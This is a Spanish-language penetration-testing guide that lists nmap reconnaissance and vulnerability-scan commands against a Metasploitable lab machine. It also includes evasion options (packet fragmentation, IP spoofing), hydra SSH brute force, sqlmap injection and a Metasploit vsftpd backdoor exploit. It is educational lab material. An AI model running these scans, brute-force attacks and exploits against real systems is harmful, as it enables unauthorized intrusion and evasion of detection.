Metodología paso a paso, comandos prácticos y ejemplos para Metasploitable | Por Manuel Balbás
Guía completa de reconocimiento y explotación
Esta guía es solo para fines educativos y pruebas en entornos que poseas o tengas permiso explícito. El uso no autorizado de estas técnicas es ilegal.
nmap -sn 192.168.1.0/24
Escaneo rápido de red
nmap -sn -PE -PS22,443,80 192.168.1.0/24
Con detección de SO y nombre
nmap -Pn 192.168.1.0/24
Más sigiloso (sin ping)
nmap -p- 192.168.1.144
Todos los puertos (lento)
nmap -sU -p 53,161,162,123 192.168.1.144
Escaneo UDP (DNS, SNMP)
nmap -p 22,80,443,8080,21,25,3306 192.168.1.144
Puertos específicos
nmap -p 1-1000 192.168.1.144
Rango de puertos
nmap -sV 192.168.1.144
Versión de servicios
nmap -sV --version-all 192.168.1.144
Versión agresiva (más intrusivo)
nmap -sC -sV 192.168.1.144
Servicios y versiones + scripts por defecto
nmap --script vuln 192.168.1.144
Buscar vulnerabilidades
nmap --script exploit 192.168.1.144
Scripts de exploits
nmap --script safe 192.168.1.144
Scripts de seguridad
nmap --script http-enum,http-vuln*,ssh-auth-methods 192.168.1.144
Scripts específicos
nmap -O 192.168.1.144
Detección de OS
nmap -O --osscan-guess 192.168.1.144
OS con más agresividad
nmap --script http-enum,http-headers,http-methods,http-vuln* -p 80,443,8080 192.168.1.144
nmap --script ssh-auth-methods,sshv1,ssh2-enum-algos -p 22 192.168.1.144
nmap --script smb-enum-shares,smb-vuln-ms17-010,smb-os-discovery -p 139,445 192.168.1.144
nmap --script ftp-anon,ftp-bounce,ftp-syst -p 21 192.168.1.144
nmap -A -T4 192.168.1.144
Escaneo completo agresivo
nmap -sS -sV -sC -O -A -T4 -p- -oA full_scan 192.168.1.144
Escaneo completo con salida
nmap -f 192.168.1.144
Fragmentación de paquetes
nmap -T0 192.168.1.144
Timing paranoico (sigiloso)
nmap -S 192.168.1.100 -e eth0 192.168.1.144
IP spoofing (evasión)
Máquina vulnerable diseñada específicamente para prácticas de pentesting
nmap -sV -sC -O 192.168.100.20
nmap --script vuln 192.168.100.20
nmap -p 21,22,23,25,53,80,111,139,445,512,513,514,1099,1524,2049,2121,3306,3632,5432,5900,6000,6667,8009,8180 192.168.100.20
nmap --script ftp-anon,ftp-brute,ftp-vuln* -p 21 192.168.100.20
nmap --script ssh-auth-methods,sshv1,ssh2-enum-algos -p 22 192.168.100.20
nmap --script smb-enum-shares,smb-vuln-ms17-010,smb-os-discovery -p 139,445 192.168.100.20
nmap --script http-enum,http-vuln*,http-headers -p 80,443,8080 192.168.100.20
nmap --script mysql-enum,mysql-vuln-cve2012-2122 -p 3306 192.168.100.20
| Fase | Comando | Descripción |
|---|---|---|
| Descubrimiento |
nmap -sn 192.168.1.0/24
|
Hosts vivos |
| Puertos |
nmap -p- 192.168.1.144
|
Todos puertos |
| Servicios |
nmap -sV 192.168.1.144
|
Versiones |
| OS |
nmap -O 192.168.1.144
|
Sistema operativo |
| Vulnerabilidades |
nmap --script vuln 192.168.1.144
|
Buscar vulns |
| Completo |
nmap -A -T4 192.168.1.144
|
Todo en uno |
| Sigiloso |
nmap -T0 -f 192.168.1.144
|
Evasión |
| UDP |
nmap -sU -p 53,161 192.168.1.144
|
Escaneo UDP |
-oN
Salida normal
-oX
Salida XML
-oG
Salida grepable
-oA
Todos los formatos
# 1. Reconocimientonmap -sn 192.168.100.0/24
# 2. Puertos y serviciosnmap -sS -sV -sC -O -p- -T4 -oA full_scan 192.168.100.20
# 3. Vulnerabilidadesnmap --script vuln,exploit -oA vuln_scan 192.168.100.20
# 4. Específico por servicio encontradonmap --script http-enum,http-vuln* -p 80,443 192.168.100.20
# 5. Fuerza bruta si hay loginhydra -l admin -P passwords.txt ssh://192.168.100.20
# Ver puertos abiertos de un scan guardadogrep "open" full_scan.nmap
# Contar serviciosgrep -c "open" full_scan.nmap
# Extraer URLs HTTPgrep -E "80/open|443/open|8080/open" full_scan.nmap
Escáner web de vulnerabilidades
nikto -h http://192.168.1.144
Fuerza bruta directorios web
dirb http://192.168.1.144
Inyección SQL automática
sqlmap -u "http://192.168.1.144/vulnerable.php?id=1" --dbs
Fuerza bruta credenciales
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.144
Framework de explotación
msfconsoleuse exploit/unix/ftp/vsftpd_234_backdoorset RHOSTS 192.168.1.144exploit
Enumeración SNMP
nmap --script snmp-info,snmp-brute -sU -p 161 192.168.1.144
Enumeración MySQL
nmap --script mysql-enum,mysql-vuln-cve2012-2122 -p 3306 192.168.1.144
Scripts personalizados NSE
nmap --script /ruta/mi_script.nse 192.168.1.144nmap --script-updatedb
Esta guía presenta una metodología estructurada para realizar pruebas de penetración utilizando Nmap como herramienta principal de reconocimiento y enumeración.
Objetivo: Descubrir hosts vivos, puertos abiertos y servicios disponibles.
Descubrimiento de hosts vivos
nmap -sn 192.168.1.0/24
Escaneo de puertos
nmap -p- 192.168.1.144
Objetivo: Identificar versiones de servicios, sistema operativo y vulnerabilidades conocidas.
Detección de servicios
nmap -sV 192.168.1.144
Scripts NSE
nmap --script vuln 192.168.1.144
Objetivo: Utilizar herramientas externas para explotar vulnerabilidades identificadas.
Herramientas complementarias
nikto -h http://192.168.1.144
Fuerza bruta
hydra -l admin -P passwords.txt ssh://192.168.1.144
Objetivo: Técnicas de evasión, timing y scripts personalizados.
Timing y evasión
nmap -T0 -f 192.168.1.144
Scripts personalizados
nmap --script /ruta/mi_script.nse 192.168.1.144